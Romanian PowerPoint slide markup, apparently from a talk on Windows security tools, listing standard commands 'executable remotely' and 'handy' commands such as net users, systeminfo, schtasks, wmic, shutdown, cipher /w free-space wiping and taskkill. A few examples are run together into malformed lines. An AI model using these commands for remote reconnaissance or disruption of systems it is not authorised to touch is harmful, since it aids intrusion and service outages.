          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1908629"/>
            <a:ext cx="11284857" cy="4833257"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Aplicații înregistrate ca servicii</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2180497"/>
            <a:ext cx="11029615" cy="489552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/windows/win32/services/writing-a-service-program-s-main-function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035717" y="2758954"/>
            <a:ext cx="5915596" cy="370309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8068500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97383" y="207246"/>
            <a:ext cx="4118452" cy="6387465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6052455" y="2447925"/>
            <a:ext cx="5348516" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Set de tool-uri de securitate, experimentale si gratuite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flowchart: Process 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188857" y="2090057"/>
            <a:ext cx="6611257" cy="20537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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268515" y="108856"/>
            <a:ext cx="4339772" cy="6662057"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0869A3-EDED-0847-72C5-64CC5747EC4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7746666" y="5218937"/>
            <a:ext cx="1495637" cy="512394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24565896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owchart: Process 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283463" y="898071"/>
            <a:ext cx="11712593" cy="584381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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283463" y="169184"/>
            <a:ext cx="10515600" cy="728888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800"/>
              <a:t>Câteva comenzi clasice de Windows care pot fi executate la distanță</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722086" y="1303110"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Afișează o listă a fișierelor și directoarelor dintr-un director.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ipconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Afișează informații despre configurarea IP a mașinii.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Afișează toate procesele care rulează pe sistem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Afișează toate conexiunile de rețea active și porturile deschise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Afișează informații detaliate despre configurarea sistemului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>net users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Afișează toți utilizatorii sistemului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>- Afișează conținutul unui fișier text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcopy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>robocopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Copiază fișiere și directoare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Șterge unul sau mai multe fișiere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>move</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Muta fișierele de la un director la altul.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Oprirea sau repornirea mașinii.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>schtasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Afișează, creează sau modifică sarcini automate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="366658"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> - Interfață de comandă pentru Instrumentația de Management Windows (Windows Management Instrumentation - WMI).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Aceste comenzi pot fi folosite în diverse scenarii, de la diagnostic și monitorizare, la administrarea sistemului și rezolvarea problemelor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17885851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4372" y="124791"/>
            <a:ext cx="11419114" cy="876695"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3600"/>
              <a:t>Comenzi pe care le puteți găsi la îndemână sau interesante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388257" y="729796"/>
            <a:ext cx="5098143" cy="3980089"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Cipher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>: Ștergeți în siguranță spațiul neutilizat al unui director. Deși nu șterge fișierele existente, este excelent pentru a vă asigura că fișierele șterse nu pot fi recuperate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cipher /w:C:\Path\To\Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Robocopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>: Înseamnă „Robust File Copy”. Este folosit pentru sarcini mai complexe de replicare a fișierelor. Excelent pentru a face copii de rezervă ale folderelor și fișierelor cu parametri detaliați, cum ar fi oglindirea unui director.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>robocopy C:\source C:\destination /MIR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>: Afișează informații detaliate de configurare despre un computer și sistemul său de operare, inclusiv detalii hardware și software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>: Afișează statisticile rețelei. Util pentru a vedea conexiunile active și porturile pe care ascultă computerul.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat -ano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"/>
              <a:t>Sfc /scannow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>: Verificatorul fișierelor de sistem scanează fișierele de sistem Windows corupte sau lipsă și încearcă să le repare. Acest lucru poate fi o salvare pentru remedierea diferitelor probleme ale sistemului.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sfc /scannow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711371" y="1058468"/>
            <a:ext cx="6212115" cy="5249642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Pe lângă închiderea computerului, acesta poate fi folosit pentru a reporni, a deconecta sau a seta un temporizator pentru aceste acțiuni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shutdown /r /t 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Instantly restarts the computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Util pentru depanarea rețelei, afișează toate valorile actuale de configurare a rețelei TCP/IP, inclusiv adresa IP, masca de subrețea și gateway-ul implicit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipconfig /all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tasklist &amp; Taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: lista de activități arată toate procesele care rulează. Comanda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> poate fi apoi folosita pentru a încheia orice proces, permițându-vă efectiv să opriti programele care nu răspund.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tasklist taskkill /F /PID process_number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assoc and Ftype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Comanda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> afișează sau modifică asocierile tipurilor de fișiere iar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ftype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> afișează sau modifică tipurile de fișiere utilizate în asocierile de extensii de fișiere. Împreună, acestea pot fi folosite pentru a schimba programul care deschide un anumit tip de fișier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assoc .txt ftype txtfile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PathPing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: O comandă care combină caracteristicile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> și </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
